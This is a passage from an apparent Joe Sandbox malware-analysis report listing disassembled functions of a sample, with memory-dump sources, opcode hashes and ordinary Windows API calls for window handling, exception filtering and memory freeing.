                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 5b880b4af196d102bda2dfc6b64bf9257322eb639113cb4dfe791047c12a60c3
                                                                  • Instruction ID: 777c659947ce3ac0bb87b6c6ba554240d66c98d0f7d36ba43f941b3059bec88b
                                                                  • Opcode Fuzzy Hash: 5b880b4af196d102bda2dfc6b64bf9257322eb639113cb4dfe791047c12a60c3
                                                                  • Instruction Fuzzy Hash: 0DF017B5E00248CFDB18CB18EC96BED77F1EB88315F144296D92593390C7B0AE80CE61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gj
                                                                  • API String ID: 0-4203073231
                                                                  • Opcode ID: 0493c95cc03e8c3cc3cf79e607424e9c9d6508f6b90dab76b565b8ae1b0d27a1
                                                                  • Instruction ID: 9a60d20ca7e94cff03141fabe8eaf9ea6a508c4f534aeeb39c48992d7af36999
                                                                  • Opcode Fuzzy Hash: 0493c95cc03e8c3cc3cf79e607424e9c9d6508f6b90dab76b565b8ae1b0d27a1
                                                                  • Instruction Fuzzy Hash: 82C12676A183818FC354CF29D88065AFBE1BFC8308F19892DE998D7311D734E955CB96
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CCF3A5), ref: 00CCF9DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 1d89c80142c5ac8a4044f66c23b99acfc1d2a01caeb0725b91f1ccc934cc1250
                                                                  • Instruction ID: 637e7a410efcf2106ccd38bd8a733236dbd0d2a4c64d8967de23d4bfa984a7ca
                                                                  • Opcode Fuzzy Hash: 1d89c80142c5ac8a4044f66c23b99acfc1d2a01caeb0725b91f1ccc934cc1250
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcess
                                                                  • String ID:
                                                                  • API String ID: 54951025-0
                                                                  • Opcode ID: 7611887fea3ca673ad40ea98975aa129d9222ee605567e5a59a431f30f09e40a
                                                                  • Instruction ID: bb24a6b4159a2b7c9bfaec9ffe70d57907e3a47888307723690f8118c253079f
                                                                  • Opcode Fuzzy Hash: 7611887fea3ca673ad40ea98975aa129d9222ee605567e5a59a431f30f09e40a
                                                                  • Instruction Fuzzy Hash: CEA012301012409B8300CF305E4C35C36A4950029030440199004C5160DA2040605600
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                  • Instruction ID: 049ed794fbff18eea00cb8fbaa672f541636b5d270cfa91906d2b1b8cbaedcf8
                                                                  • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                  • Instruction Fuzzy Hash: 0462F8716047849FCB25CF28C590BB9BBE1BF95304F08896DE8EA8B346D734EA45DB11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                  • Instruction ID: 0cf18f4558e3e7783f7eb8eed3cb925c2f3044f917835b2ecbaa85482bcae098
                                                                  • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                  • Instruction Fuzzy Hash: EE62D8716083458FCB15CF28C890AB9BBE1FF95304F188A6DE9AA8B346D730E945CF55
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                  • Instruction ID: f71084d9a0ac9112883f08a1bf86c8979afdede626dc5e3cb3e20dd17f3ab2cf
                                                                  • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                  • Instruction Fuzzy Hash: 61522972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd402d5c17cccce2969f2ad70d2b00b4cc7774edef450237b63e45765ac801da
                                                                  • Instruction ID: fc61fd463d46e5a5184a92609f87a4c317fecae6ee3d46be6eb4255c4649d7af
                                                                  • Opcode Fuzzy Hash: dd402d5c17cccce2969f2ad70d2b00b4cc7774edef450237b63e45765ac801da
                                                                  • Instruction Fuzzy Hash: FC12BFB16187069FC718CF28C890BB9B7E1FB94304F148A2EE996C7681E334E995DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6161e6826ed8594f34f9992fb08e9bb7d56606ed244211630d24eb993db36469
                                                                  • Instruction ID: 5485154e83eeb45f6fb2e1a7fa718bebdbd88948fda3161802a491fb1adc4599
                                                                  • Opcode Fuzzy Hash: 6161e6826ed8594f34f9992fb08e9bb7d56606ed244211630d24eb993db36469
                                                                  • Instruction Fuzzy Hash: 54F19971A083018FD718CF29C4C4AAEBBE5EFDA314F144A2EF4A597251D730EA45CB42
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 658a36decd893c650e87ed1563ff6c113b2068c8530b6f65ab00a57648948d60
                                                                  • Instruction ID: 4c24eb942d038fd4f413782d0328fb63c2ef9d2b0a4c05211e5baea01e4ec363
                                                                  • Opcode Fuzzy Hash: 658a36decd893c650e87ed1563ff6c113b2068c8530b6f65ab00a57648948d60
                                                                  • Instruction Fuzzy Hash: 61E158755083948FC304CF29D8849AEBFF0AF9A304F45495EFAD497352C235EA19DBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                  • Instruction ID: af5fde13370a3de3035173f3cb953360fd947ee578d37fbc30e480a9553677a6
                                                                  • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                  • Instruction Fuzzy Hash: 0D9137B02003459BDB2CEE64E8A1FFE77D5EB90300F14892DF9D6C72C2DA649646D752
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                  • Instruction ID: bf30c9ab6dc999d2e0c4aef784282351f6c03c9f0c99098c0f99888b5b1a00dd
                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                  • Instruction Fuzzy Hash: B0815BB13043464BDB2DDF68D8E0FBD37D4AB90304F10892DF9D68B6C2DA7489869756
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b435c17ffd2a7eb2f39c14c3931460f1e15b7718256c1364b49ff4f65d34773
                                                                  • Instruction ID: fb0678ef21452d88ca9325c97b2edf87f8df0055371c830d4a71a71ff540616b
                                                                  • Opcode Fuzzy Hash: 0b435c17ffd2a7eb2f39c14c3931460f1e15b7718256c1364b49ff4f65d34773
                                                                  • Instruction Fuzzy Hash: 7461AA71600F086BDA389A68AC91BBF7394EB11380F14061FE7A3DF391D6A1DF4A9715
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                  • Instruction ID: 82eeefe8867dc9323a6a1fbb70973d82510a4393d294a7bac27c34a1ba96bd12
                                                                  • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                  • Instruction Fuzzy Hash: 26516760600F455BDF3856A88556FBF67C59B12300F18082BEBA3DB792C625FF45E3A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17cca0353eceb28ec7fb49d329231b23b08a8ba4c1ae0623540482ee945e9ac2
                                                                  • Instruction ID: 08de14cdf645858243e7f2440a7958401b7c0f79f05d19cbb6ee528ccdf31997
                                                                  • Opcode Fuzzy Hash: 17cca0353eceb28ec7fb49d329231b23b08a8ba4c1ae0623540482ee945e9ac2
                                                                  • Instruction Fuzzy Hash: 0151D2315083D58AD702DF28D9804AEBFF0AE9A314F4909ADE4D95B353C231DB4ADB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4441376817896fe9a24be1a3e2796e8271c2ea2e9af23c11e07f5af987a3b5e7
                                                                  • Instruction ID: a13309c01376a870a75bc47c94ed5bc389a5dfd70e185256b126163c91a8fc6c
                                                                  • Opcode Fuzzy Hash: 4441376817896fe9a24be1a3e2796e8271c2ea2e9af23c11e07f5af987a3b5e7
                                                                  • Instruction Fuzzy Hash: DF51E0B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D735EA59CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                  • Instruction ID: 432967320d62bc3c0483947919a1931c1e2a20d0a87f5ae45085c00d5ebea118
                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                  • Instruction Fuzzy Hash: 193108B1A147468FCB18DF68D8516AEBBE0FB95304F10892DE4D9C7742C735EA0ACB91
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 00CBE30E
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                    • Part of subcall function 00CC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CF1030,?,00CBD928,00000000,?,00000050,00CF1030), ref: 00CC1DC4
                                                                  • _strlen.LIBCMT ref: 00CBE32F
                                                                  • SetDlgItemTextW.USER32(?,00CEE274,?), ref: 00CBE38F
                                                                  • GetWindowRect.USER32(?,?), ref: 00CBE3C9
                                                                  • GetClientRect.USER32(?,?), ref: 00CBE3D5
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CBE475
                                                                  • GetWindowRect.USER32(?,?), ref: 00CBE4A2
                                                                  • SetWindowTextW.USER32(?,?), ref: 00CBE4DB
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00CBE4E3
                                                                  • GetWindow.USER32(?,00000005), ref: 00CBE4EE
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00CBE51B
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00CBE58D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                  • String ID: $%s:$CAPTION$d
                                                                  • API String ID: 2407758923-2512411981
                                                                  • Opcode ID: dccb80c5b371281da3ecb64b4d734e90ad476ebe3757663f3961231a62fd721f
                                                                  • Instruction ID: d69ce58154c1271726c917b9b4fd09ad1600cbe29d6fae73567c5892672f120f
                                                                  • Opcode Fuzzy Hash: dccb80c5b371281da3ecb64b4d734e90ad476ebe3757663f3961231a62fd721f
                                                                  • Instruction Fuzzy Hash: 1881B371108341AFD710DFA8CC89AAFBBE9EBC8B04F04491DFA95D7251D731E9458B62
                                                                  APIs
                                                                  • ___free_lconv_mon.LIBCMT ref: 00CDCB66
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC71E
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC730
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC742
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC754
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC766
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC778
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC78A
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC79C
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7AE
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7C0
